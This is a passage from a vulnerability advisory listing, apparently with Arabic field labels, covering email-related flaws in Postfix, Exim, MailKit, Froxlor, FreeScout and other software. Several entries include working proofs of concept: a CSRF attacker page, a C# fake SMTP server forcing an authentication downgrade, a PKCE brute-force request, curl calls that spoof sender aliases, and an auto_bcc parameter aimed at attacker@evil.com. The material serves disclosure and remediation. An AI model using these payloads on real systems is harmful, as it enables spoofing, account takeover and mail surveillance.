Postfix before 3.8.16, 3.9 before 3.9.10, and 3.10 before 3.10.9 sometimes allows a buffer over-read and process crash via an enhanced status code that lacks text after the third number.

نوع الثغرة

CWE-193 — CWE-193

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

المراجع

الوصف الكامل

A flaw was found in the AAP gateway. The user auto-link strategy, introduced in AAP 2.6, automatically links an external Identity Provider (IDP) identity to an existing AAP user account based on email matching without verifying email ownership. This allows a remote attacker to potentially hijack a victim's account or gain unauthorized access to other accounts, including administrative accounts, by manipulating the IDP-provided email.

نوع الثغرة

CWE-305 — CWE-305

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

المراجع

الوصف الكامل

In mutt before 2.3.2, the imap_auth_gss security level is mishandled.

نوع الثغرة

CWE-843 — CWE-843

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

mutt before 2.3.2 sometimes truncates the hash_passwd by one byte for IMAP auth_cram MD5 digest.

نوع الثغرة

CWE-193 — CWE-193

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

mutt before 2.3.2 sometimes uses strfcpy instead of memcpy for the IMAP auth_cram MD5 digest.

نوع الثغرة

CWE-158 — CWE-158

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

phpBB before 3.3.16 is vulnerable to Host Header Injection that can lead to password rest link poisoning. When force_server_vars is disabled, the servers hostname may be extracted from the HTTP Host header which is used to generate the password reset link URL. An attacker who can manipulate the Host header (e.g. through misconfigured host setup or missing header validation by the webserver) can cause password reset emails to contain a link pointing to an attacker-controlled domain, potentially leading to account takeover.

نوع الثغرة

CWE-640 — CWE-640

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

المراجع

الوصف الكامل

A weakness has been identified in SourceCodester Advanced School Management System 1.0. The affected element is an unknown function of the file commonController.php of the component checkEmail Endpoint. This manipulation causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.

نوع الثغرة

CWE-74 — Injection

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

In Exim before 4.99.2, when the SPA authentication driver is used with an adversarial SPA resource, there can be an out-of-bounds write that crashes the connection instance, or erroneous data processing that divulges data from uninitialized heap memory.

الإصدارات المتأثرة

4.99.2

نوع الثغرة

CWE-909 — CWE-909

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L

المراجع

الوصف الكامل

In Exim before 4.99.2, on systems using musl libc (not glibc), an attacker can crash the connection instance when malformed DNS data is present in PTR records. This is caused by a dn_expand oddity in octal printing.

الإصدارات المتأثرة

4.99.2

نوع الثغرة

CWE-684 — CWE-684

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

A flaw was found in gnutls. This vulnerability occurs because gnutls performs case-sensitive comparisons of `nameConstraints` labels, specifically for `dNSName` (DNS) or `rfc822Name` (email) constraints within `excludedSubtrees` or `permittedSubtrees`. A remote attacker can exploit this by crafting a leaf certificate with casing differences in the Subject Alternative Name (SAN), leading to a policy bypass where a certificate that should be rejected is instead accepted. This could result in unauthorized access or information disclosure.

نوع الثغرة

CWE-178 — CWE-178

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

An issue in Krayin CRM v.2.1.5, which was fixed in v.2.1.6 allows a remote attacker to execute arbitrary code via the compose email function.

الإصدارات المتأثرة

2.1.5, v2.1.5

نوع الثغرة

CWE-94 — Code Injection

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

المراجع

الوصف الكامل

## Summary Several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) fire via GET requests with no CSRF token validation. Because `SameSite=Lax` cookies travel with top-level GET navigations, an attacker forces an authenticated admin to trigger these actions from a malicious page. ## Details In `modules/preferences.php`, the `backup`, `test_email`, and `htaccess` modes accept GET parameters with no CSRF token check: ```php // modules/preferences.php - backup mode case 'backup': // Creates full database dump and serves as download // No CSRF token validation $backupFile = $gDb->backup(); // ... sends file to client break; case 'test_email': // Sends test email from the server // No CSRF token validation break; case 'htaccess': // Writes .htaccess file to disk // No CSRF token validation break; ``` The `save` mode in the same file validates CSRF via `getFormObject()`, confirming the developers intended CSRF protection but did not apply it to these other modes. Because these are GET requests, `SameSite=Lax` browsers include session cookies on top-level cross-origin navigations, making CSRF exploitation trivial. ## Proof of Concept Simplified attacker page (`csrf.html` hosted on attacker origin): ```html <html> <body> <h1>Loading...</h1> <!-- Trigger backup creation on victim's browser --> <script>window.location = 'https://target-admidio.example.com/adm_program/modules/preferences.php?mode=backup';</script> </body> </html> ``` When an administrator visits this page, the browser navigates to the Admidio backup URL with full session cookies. The server generates a database dump and serves it as a download to the victim's browser. Note: the backup downloads to the victim's machine, not to the attacker. The attacker cannot read the response cross-origin. For `htaccess` mode, the CSRF overwrites the `.htaccess` file on the server, disrupting the application. For `test_email` mode, it triggers email sends from the server, which an attacker can abuse for spam or to probe internal email infrastructure. ## Impact An attacker tricks an Admidio administrator into visiting a malicious page that triggers state-changing operations on the server: - **Backup creation**: forces the server to generate a full database dump. The backup downloads to the victim's browser, not to the attacker. However, repeated backup triggers can cause disk I/O and storage pressure on the server. - **htaccess modification**: overwrites the server's `.htaccess` file, breaking URL routing or disabling security headers. - **Test email**: fires email sends from the server, usable as a spam relay or to probe internal mail configuration. The core issue is that state-changing operations run via unprotected GET requests. The victim only needs to visit a single attacker-controlled page while logged in. ## Recommended Fix 1. Change `backup`, `test_email`, and `htaccess` operations to require POST requests. 2. Add CSRF token validation using the existing `getFormObject()` mechanism. 3. As defense in depth, set `SameSite=Strict` on session cookies or add a confirmation step for destructive operations like database backup. --- *Found by [aisafe.io](https://aisafe.io)*

الإصدارات المتأثرة

<= 5.0.8

نوع الثغرة

CWE-352 — CSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:L

المراجع

الوصف الكامل

Helpy contains a stored cross-site scripting vulnerability in the post author display logic. Any registered user can persist arbitrary HTML in their account name field and cause it to be rendered unescaped in public forum threads where they participate, in the admin ticket view, and in HTML notification emails sent to other users.This issue affects helpy: 2.8.0.

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

An insecure direct object reference (IDOR) vulnerability in MphRx's Minerva V3.6.0, specifically in the '/minerva/user/updateUserProfile' endpoint. This allows an authenticated user to modify the information of other registered users. Successful exploitation of this vulnerability allows an authenticated user to modify other users' information, such as their email address, and request a new password via the '/webconnect/#/forgotPassword' endpoint. This could lead to complete account takeover.

نوع الثغرة

CWE-284 — CWE-284

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

A vulnerability has been found in code-projects Online Lot Reservation System up to 1.0. The impacted element is an unknown function of the file /loginuser.php. The manipulation of the argument email/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

نوع الثغرة

CWE-74 — Injection

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

CEWE Photoshow 6.3.4 contains a buffer overflow vulnerability in the login dialog that allows attackers to crash the application by submitting oversized input. Attackers can inject 4000 bytes of data into the email address and password fields to trigger a denial of service condition.

نوع الثغرة

CWE-120 — Buffer Overflow

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

A flaw has been found in Tenda F456 1.0.0.5. Affected is the function SafeEmailFilter of the file /goform/SafeEmailFilter. This manipulation of the argument page causes buffer overflow. The attack can be initiated remotely. The exploit has been published and may be used.

نوع الثغرة

CWE-119 — Buffer Overflow

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

المراجع

الوصف الكامل

An unauthenticated attacker can send arbitrary HTML-rendered emails from a pretalx instance's configured sender address by embedding malformed HTML or markdown link syntax in a user-controlled template placeholder such as the account display name. The most direct vector is the password-reset flow: the attacker registers an account with a malicious name, enters the victim's email address, and triggers a password reset. The resulting email is delivered from the event's legitimate sender address and passes SPF/DKIM/DMARC validation, making it a ready-made phishing vector. The same class of bug affects every mail template that interpolates a user-controlled placeholder (speaker name, proposal title, biography, question answers, etc.), including organiser-triggered emails such as acceptance/rejection notifications. ### Credits Thanks go to Mark Fijneman for finding and reporting a subset of this issue, which alerted us to the wider vulnerability.

الإصدارات المتأثرة

2026.1.0

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

### Summary A STARTTLS Response Injection vulnerability in MailKit allows a Man-in-the-Middle attacker to inject arbitrary protocol responses across the plaintext-to-TLS trust boundary, enabling SASL authentication mechanism downgrade (e.g., forcing PLAIN instead of SCRAM-SHA-256). The internal read buffer in `SmtpStream`, `ImapStream`, and `Pop3Stream` is not flushed when the underlying stream is replaced with `SslStream` during STARTTLS upgrade, causing pre-TLS attacker-injected data to be processed as trusted post-TLS responses. This is the same vulnerability class as CVE-2021-23993 (Thunderbird), CVE-2021-33515 (Dovecot), and CVE-2011-0411 (Postfix). ### Details The `Stream` property in `SmtpStream` (line 84-86), `ImapStream`, and `Pop3Stream` is a simple auto-property with no buffer reset: ```csharp public Stream Stream { get; internal set; // ← No buffer reset on set! } ``` During the STARTTLS upgrade in `SmtpClient.cs` (lines 1372-1389): ```csharp // Reads STARTTLS response — "220 Ready" consumed, any extra data stays in buffer response = Stream.SendCommand("STARTTLS\r\n", cancellationToken); // Swaps to TLS — buffer NOT flushed! var tls = new SslStream(stream, false, ValidateRemoteCertificate); Stream.Stream = tls; SslHandshake(tls, host, cancellationToken); // Reads EHLO response — processes INJECTED pre-TLS data from buffer first! Ehlo(true, cancellationToken); ``` A MitM appends extra data after the `"220 Ready\r\n"` STARTTLS response. Both arrive in one TCP read into `SmtpStream`'s 4096-byte internal buffer. `ReadResponse()` parses `"220 Ready"` and stops — the injected data remains at `inputIndex`. After `Stream.Stream = tls`, the buffer is not cleared. When `Ehlo()` calls `ReadResponse()`, it checks `inputIndex == inputEnd` — this is FALSE (injected data exists), so it processes the buffered pre-TLS data without reading from the new TLS stream. The same pattern exists in `ImapClient.cs` (lines 1485-1509) and `Pop3Client.cs`. **Attack flow:** ``` Client MitM Real Server |--- STARTTLS ---------->|--- STARTTLS ----------->| | |<-- 220 Ready -----------| |<-- "220 Ready\r\n"-----| | | "250-evil\r\n" | ← INJECTED | | "250 AUTH PLAIN\r\n" | ← INJECTED | | "250 OK\r\n" | ← INJECTED | |===== TLS HANDSHAKE ====|==== PASSES THROUGH =====| |--- EHLO (over TLS) --->| | | Reads from BUFFER: | | | "250 AUTH PLAIN" | ← PRE-TLS DATA | | PROCESSED AS POST-TLS! | | ``` **Suggested fix:** Reset buffer indices when the stream is replaced: ```csharp internal set { stream = value; inputIndex = inputEnd; } ``` ### PoC Self-contained C# PoC — creates a fake SMTP server that injects a crafted EHLO response into the STARTTLS reply: ```csharp using System; using System.Net; using System.Net.Security; using System.Net.Sockets; using System.Security.Cryptography; using System.Security.Cryptography.X509Certificates; using System.Text; using System.Threading; using System.Threading.Tasks; using MailKit.Net.Smtp; using MailKit.Security; class PoC { static void Main() { using var rsa = RSA.Create(2048); var req = new CertificateRequest("CN=test", rsa, HashAlgorithmName.SHA256, RSASignaturePadding.Pkcs1); var cert = new X509Certificate2(req.CreateSelfSigned( DateTimeOffset.UtcNow.AddDays(-1), DateTimeOffset.UtcNow.AddDays(365)).Export(X509ContentType.Pfx)); var listener = new TcpListener(IPAddress.Loopback, 0); listener.Start(); int port = ((IPEndPoint)listener.LocalEndpoint).Port; Task.Run(() => { using var tcp = listener.AcceptTcpClient(); var s = tcp.GetStream(); Send(s, "220 evil.example.com ESMTP\r\n"); Read(s); Send(s, "250-evil.example.com\r\n250-STARTTLS\r\n250-AUTH SCRAM-SHA-256\r\n250 OK\r\n"); Read(s); // ATTACK: inject fake EHLO response after "220 Ready" Send(s, "220 Ready\r\n250-evil.example.com\r\n250-AUTH PLAIN LOGIN\r\n250 OK\r\n"); var ssl = new SslStream(s, false); ssl.AuthenticateAsServer(cert, false, false); ReadSsl(ssl); SendSsl(ssl, "250-evil.example.com\r\n250-AUTH SCRAM-SHA-256\r\n250 OK\r\n"); Thread.Sleep(2000); }); using var client = new SmtpClient(); client.ServerCertificateValidationCallback = (a, b, c, d) => true; client.Connect("127.0.0.1", port, SecureSocketOptions.StartTls); Console.WriteLine($"Auth mechanisms: {string.Join(", ", client.AuthenticationMechanisms)}"); // OUTPUT: "Auth mechanisms: PLAIN, LOGIN" // Server advertised SCRAM-SHA-256 — DOWNGRADE CONFIRMED client.Disconnect(false); listener.Stop(); } static void Send(NetworkStream s, string d) { s.Write(Encoding.ASCII.GetBytes(d)); s.Flush(); } static string Read(NetworkStream s) { var b = new byte[4096]; return Encoding.ASCII.GetString(b, 0, s.Read(b)); } static void SendSsl(SslStream s, string d) { s.Write(Encoding.ASCII.GetBytes(d)); s.Flush(); } static string ReadSsl(SslStream s) { var b = new byte[4096]; return Encoding.ASCII.GetString(b, 0, s.Read(b)); } } ``` **Result against MailKit 4.12.0:** ``` Auth mechanisms: PLAIN, LOGIN (Real server advertised SCRAM-SHA-256 — SASL mechanism DOWNGRADE achieved) ``` ### Impact Any application using MailKit with `SecureSocketOptions.StartTls` or `StartTlsWhenAvailable` (the default) is vulnerable. A network Man-in-the-Middle attacker can inject arbitrary SMTP/IMAP/POP3 responses that cross the plaintext-to-TLS trust boundary, enabling SASL authentication mechanism downgrade and capability manipulation. All three protocols (SMTP, IMAP, POP3) share the same vulnerable pattern. All MailKit versions through 4.12.0 are affected.

الإصدارات المتأثرة

All versions < 0.1.0, 0.10.0, 0.11.0, 0.12.0, 0.13.0

نوع الثغرة

CWE-74 — Injection

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

المراجع

الوصف الكامل

## Summary The token exchange path accepts RFC7636-invalid `code_verifier` values (including one-character strings) for `S256` PKCE flows. Because short/weak verifiers are accepted and failed verifier attempts do not consume the authorization code, an attacker who intercepts an authorization code can brute-force `code_verifier` guesses online until token issuance succeeds. ### Root cause 1. `lib/pkce/pkce.js` (`getHashForCodeChallenge`) only checks that `verifier` is a non-empty string before hashing for `S256`; it does not enforce RFC7636 ABNF (`43..128` unreserved chars). 2. `lib/grant-types/authorization-code-grant-type.js` compares `hash(code_verifier)` to stored `codeChallenge` without validating verifier format/length. 3. In `AuthorizationCodeGrantType.handle`, authorization code revocation happens **after** verifier validation. Invalid guesses fail before revoke, so the same code can be retried repeatedly. ## Steps to Reproduce ### Setup - PKCE authorization code exists with: - `codeChallengeMethod = "S256"` - `codeChallenge = BASE64URL(SHA256("z"))` (verifier is one character, RFC-invalid) - Attacker has intercepted the authorization code value. ### Reproduction 1. Send repeated token requests with guessed `code_verifier` values: ```http POST /token HTTP/1.1 Host: oauth.example Content-Type: application/x-www-form-urlencoded grant_type=authorization_code& client_id=client1& client_secret=s3cret& code=stolen-auth-code& redirect_uri=https://client.example/callback& code_verifier=<guess> ``` 2. Observe invalid guesses return `invalid_grant`. 3. Continue guessing (`a`..`z`). 4. When `code_verifier=z`, token issuance succeeds and returns bearer tokens. ### Confirmed PoC output ```text BRUTE_FORCE_SUCCESS { tries: 26, guess: 'z', status: 200, tokenIssued: true } ``` ## Impact An intercepted authorization code can be redeemed by brute-forcing low-entropy verifiers that the server should have rejected under RFC7636. This weakens PKCE’s protection goal and allows token theft when clients generate short/predictable verifiers. ## Recommended Fix 1. Enforce `pkce.codeChallengeMatchesABNF(request.body.code_verifier)` in authorization code token exchange before hashing/comparison. 2. Reject verifier values outside RFC7636 charset/length (`43..128` unreserved). 3. Invalidate authorization codes on failed verifier attempts (or add strict retry limits) to prevent online guessing.

نوع الثغرة

CWE-307 — CWE-307

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

## Summary In `EmailSender::add()`, the domain ownership validation for full email sender aliases uses the wrong array index when splitting the email address, passing the local part instead of the domain to `validateLocalDomainOwnership()`. This causes the ownership check to always pass for non-existent "domains," allowing any authenticated customer to add sender aliases for email addresses on domains belonging to other customers. Postfix's `sender_login_maps` then authorizes the attacker to send emails as those addresses. ## Details In `lib/Froxlor/Api/Commands/EmailSender.php` at line 100, when a customer adds a full email address (not a `@domain` wildcard) as an allowed sender, the code splits on `@` and takes index `[0]`: ```php // Line 96-106 if (substr($allowed_sender, 0, 1) != '@') { if (!Validate::validateEmail($idna_convert->encode($allowed_sender))) { Response::standardError('emailiswrong', $allowed_sender, true); } self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? ""); // BUG: [0] is the local part } else { if (!Validate::validateDomain($idna_convert->encode(substr($allowed_sender, 1)))) { Response::standardError('wildcardemailiswrong', substr($allowed_sender, 1), true); } self::validateLocalDomainOwnership(substr($allowed_sender, 1)); // CORRECT: passes domain } ``` For input `admin@domain-b.com`, `explode("@", "admin@domain-b.com")` returns `["admin", "domain-b.com"]`. Index `[0]` is `"admin"` — the local part, not the domain. The `validateLocalDomainOwnership()` function (lines 346-355) then queries `panel_domains` for a domain matching `"admin"`: ```php private static function validateLocalDomainOwnership(string $domain): void { $sel_stmt = Database::prepare("SELECT customerid FROM `" . TABLE_PANEL_DOMAINS . "` WHERE `domain` = :domain"); $domain_result = Database::pexecute_first($sel_stmt, ['domain' => $domain]); if ($domain_result && $domain_result['customerid'] != CurrentUser::getField('customerid')) { Response::standardError('senderdomainnotowned', $domain, true); } } ``` Since no domain named `"admin"` exists in `panel_domains`, `$domain_result` is false, and the function returns without error — the ownership check silently passes. The inserted `mail_sender_aliases` row is then picked up by Postfix's `sender_login_maps` query (configured in `mysql-virtual_sender_permissions.cf`): ```sql ... UNION (SELECT mail_sender_aliases.email FROM mail_sender_aliases WHERE mail_sender_aliases.allowed_sender = '%s') ... ``` This query maps the `allowed_sender` back to the mail user, authorizing them to send as that address via SMTP. ## PoC ```bash # Prerequisites: Froxlor instance with mail.enable_allow_sender enabled, # two customers: Customer A (owns domain-a.com) and Customer B (owns domain-b.com) # Step 1: As Customer A, add a sender alias claiming Customer B's domain # Via API: curl -X POST 'https://froxlor-host/api/v1/' \ -H 'Authorization: Basic <customer-A-credentials>' \ -H 'Content-Type: application/json' \ -d '{ "command": "EmailSender.add", "params": { "emailaddr": "myaccount@domain-a.com", "allowed_sender": "ceo@domain-b.com" } }' # Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B # Actual: 200 OK — alias is created because validateLocalDomainOwnership # receives "ceo" (local part) instead of "domain-b.com" (domain) # Step 2: Verify the alias was inserted curl -X POST 'https://froxlor-host/api/v1/' \ -H 'Authorization: Basic <customer-A-credentials>' \ -H 'Content-Type: application/json' \ -d '{ "command": "EmailSender.listing", "params": {"emailaddr": "myaccount@domain-a.com"} }' # Step 3: Customer A can now send email as ceo@domain-b.com via SMTP # because Postfix sender_login_maps will match the mail_sender_aliases entry # and authorize Customer A's mail account to use that sender address. ``` The same attack works via the web UI by POST-ing to `customer_email.php` with `action=add_sender` and the target domain in `allowed_domain`. ## Impact Any authenticated customer on a multi-tenant Froxlor instance can add sender aliases for email addresses on domains belonging to other customers. This allows: - **Cross-customer email spoofing**: Send emails impersonating users on other customers' domains, bypassing Postfix's `smtpd_sender_login_maps` restriction that is specifically designed to prevent this. - **Multi-tenant isolation breach**: The domain ownership check (`validateLocalDomainOwnership`) is the only barrier preventing cross-customer sender aliasing, and it is completely ineffective for full email addresses. - **Phishing and reputation damage**: Spoofed emails originate from the legitimate mail server, passing SPF/DKIM checks for the target domain if those records point to the Froxlor server. Note: The wildcard (`@domain`) code path at line 105 is **not** affected — it correctly passes the domain to `validateLocalDomainOwnership()`. ## Recommended Fix Change index `[0]` to `[1]` on line 100 of `lib/Froxlor/Api/Commands/EmailSender.php`: ```php // Before (line 100): self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? ""); // After: self::validateLocalDomainOwnership(explode("@", $allowed_sender)[1] ?? ""); ``` This ensures the domain part of the email address is passed to the ownership validation, matching the behavior of the wildcard path on line 105.

الإصدارات المتأثرة

2.3.6

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

المراجع

الوصف الكامل

ICEWARP 11.0.0.0 contains a cross-site scripting vulnerability that allows attackers to inject malicious HTML elements into emails by embedding base64-encoded payloads in object and embed tags. Attackers can craft emails containing data URIs with embedded scripts that execute in the client when the email is viewed, compromising user sessions and stealing sensitive information.

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

LinkAce is a self-hosted archive to collect website links. Prior to 2.5.4, a password reset poisoning vulnerability was identified in the application due to improper trust of user-controlled HTTP headers. The application uses the X-Forwarded-Host header when generating password reset URLs. By manipulating this header during a password reset request, an attacker can inject an attacker-controlled domain into the reset link sent via email. As a result, the victim receives a password reset email containing a malicious link pointing to an attacker-controlled domain. When the victim clicks the link, the password reset token is transmitted to the attacker-controlled server. An attacker can capture this token and use it to reset the victim’s password, leading to full account takeover. This vulnerability is fixed in 2.5.4.

نوع الثغرة

CWE-601 — Open Redirect

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

المراجع

الوصف الكامل

## Summary The file `git.json.php` at the web root executes `git log -1` and returns the full output as JSON to any unauthenticated user. This exposes the exact deployed commit hash (enabling version fingerprinting against known CVEs), developer names and email addresses (PII), and commit messages which may contain references to internal systems or security fixes. ## Details `git.json.php` is a standalone PHP script with no authentication, no session validation, and no framework bootstrap. It directly executes a shell command and returns the result: ```php // git.json.php — complete file <?php header('Content-Type: application/json'); $cmd = "git log -1"; exec($cmd . " 2>&1", $output, $return_val); $obj = new stdClass(); $obj->output = $output; foreach ($output as $value) { preg_match("/Date:(.*)/i", $value, $match); if (!empty($match[1])) { $obj->date = strtotime($match[1]); $obj->dateString = trim($match[1]); $obj->dateMySQL = date("Y-m-d H:i:s", $obj->date); } } echo json_encode($obj); ``` The file does not `require` any configuration or authentication module. It is not protected by `.htaccess` rules. The endpoint is directly accessible to any network client. The exposed data enables: 1. **Version fingerprinting**: The commit hash identifies the exact deployed version, allowing attackers to cross-reference the project's public git history against known CVEs (AVideo has 22 published GHSAs) to determine which vulnerabilities remain unpatched on a given instance. 2. **Developer PII leakage**: Author name and email from the git commit are exposed. On self-hosted instances, this may reveal internal/corporate email addresses not otherwise publicly available. 3. **Commit message intelligence**: Commit messages may reference internal bug trackers, security fixes in progress, or infrastructure details. ## PoC ```bash # Single unauthenticated request — no cookies, no headers needed curl -s https://target.example/git.json.php | python3 -m json.tool ``` Verified response from test instance: ```json { "output": [ "commit 80a8af96e861cff45cd80fdd2478d00b2c07749e", "Author: Daniel Neto <me@danielneto.com>", "Date: Wed Apr 8 16:07:23 2026 -0300", "", " fix: Update payment response handling to include transaction token and URL" ], "date": 1775675243, "dateString": "Wed Apr 8 16:07:23 2026 -0300", "dateMySQL": "2026-04-08 19:07:23" } ``` ## Impact - Any unauthenticated remote attacker can determine the exact deployed version and identify which known CVEs (22 published GHSAs for AVideo) apply to the target instance. - Developer email addresses are leaked, enabling targeted phishing or social engineering against project maintainers and contributors. - Commit messages may disclose internal project details, security fix status, or infrastructure information. ## Recommended Fix Delete `git.json.php` entirely — it serves no user-facing purpose and exists only as a development/debug artifact: ```bash rm git.json.php ``` If version display is needed for administrators, gate it behind authentication: ```php <?php require_once 'videos/configuration.php'; if (!User::isAdmin()) { header('HTTP/1.1 403 Forbidden'); die(json_encode(['error' => 'Forbidden'])); } header('Content-Type: application/json'); $cmd = "git log -1"; exec($cmd . " 2>&1", $output, $return_val); $obj = new stdClass(); $obj->output = $output; foreach ($output as $value) { preg_match("/Date:(.*)/i", $value, $match); if (!empty($match[1])) { $obj->date = strtotime($match[1]); $obj->dateString = trim($match[1]); $obj->dateMySQL = date("Y-m-d H:i:s", $obj->date); } } echo json_encode($obj); ```

الإصدارات المتأثرة

29.0

نوع الثغرة

CWE-200 — Info Disclosure

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.214, the phone-conversation creation flow accepts attacker-controlled `customer_id`, `name`, `to_email`, and `phone` values and resolves the target customer in the backend without enforcing mailbox-scoped customer visibility. As a result, a low-privileged agent who can create a phone conversation in Mailbox A can bind the new Mailbox A phone conversation to a hidden customer from Mailbox B and add a new alias email to that hidden customer record by supplying `to_email`. Version 1.8.214 fixes the vulnerability.

نوع الثغرة

CWE-639 — IDOR

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.214, the Change Customer modal exposes a “Create a new customer” flow via POST /customers/ajax with action=create. Under limited visibility, the endpoint drops unique-email validation. If the supplied email already belongs to a hidden customer, Customer::create() reuses that hidden customer object and fills empty profile fields from attacker-controlled input. Version 1.8.214 fixes the vulnerability.

نوع الثغرة

CWE-639 — IDOR

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.214, a low-privileged agent can edit a visible customer and add an email address already owned by a hidden customer in another mailbox. The server discloses the hidden customer’s name and profile URL in the success flash, reassigns the hidden email to the visible customer, and rebinds hidden-mailbox conversations for that email to the visible customer. Version 1.8.214 fixes the issue.

نوع الثغرة

CWE-639 — IDOR

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

المراجع

الوصف الكامل

blueprintUE is a tool to help Unreal Engine developers. Prior to 4.2.0, when a password reset is initiated, a 128-character CSPRNG token is generated and stored alongside a password_reset_at timestamp. However, the token redemption function findUserIDFromEmailAndToken() queries only for a matching email + password_reset token pair — it does not check whether the password_reset_at timestamp has elapsed any maximum window. A generated reset token is valid indefinitely until it is explicitly consumed or overwritten by a subsequent reset request. This vulnerability is fixed in 4.2.0.

نوع الثغرة

CWE-640 — CWE-640

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, the `load_customer_info` action in `POST /conversation/ajax` returns complete customer profile data to any authenticated user without verifying mailbox access. An attacker only needs a valid email address to retrieve all customer PII. Version 1.8.213 fixes the issue.

نوع الثغرة

CWE-639 — IDOR

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Versions prior to 1.8.213 have a mass assignment vulnerability in the mailbox connection settings endpoints of FreeScout (`connectionIncomingSave()` at `app/Http/Controllers/MailboxesController.php:468` and `connectionOutgoingSave()` at line 398). Both methods pass `$request->all()` directly to `$mailbox->fill()` without any field allowlisting, allowing an authenticated admin to overwrite any of the 32 fields in the Mailbox model's `$fillable` array -- including security-critical fields that do not belong to the connection settings form, such as `auto_bcc`, `out_server`, `out_password`, `signature`, `auto_reply_enabled`, and `auto_reply_message`. Validation in `connectionIncomingSave()` is entirely commented out, and the validator in `connectionOutgoingSave()` only checks value formats for SMTP fields without stripping extra parameters. An authenticated admin user can exploit this by appending hidden parameters (e.g., `auto_bcc=attacker@evil.com`) to a legitimate connection settings save request. Because the `auto_bcc` field is not displayed on the connection settings form (it only appears on the general mailbox settings page), the injection is invisible to other administrators reviewing connection settings. Once set, every outgoing email from the affected mailbox is silently BCC'd to the attacker via the `SendReplyToCustomer` job. The same mechanism allows redirecting outgoing SMTP through an attacker-controlled server, injecting tracking pixels or phishing links into email signatures, and enabling attacker-crafted auto-replies -- all from a single HTTP request. This is particularly dangerous in multi-admin environments where one admin can silently surveil mailboxes managed by others, and when an admin 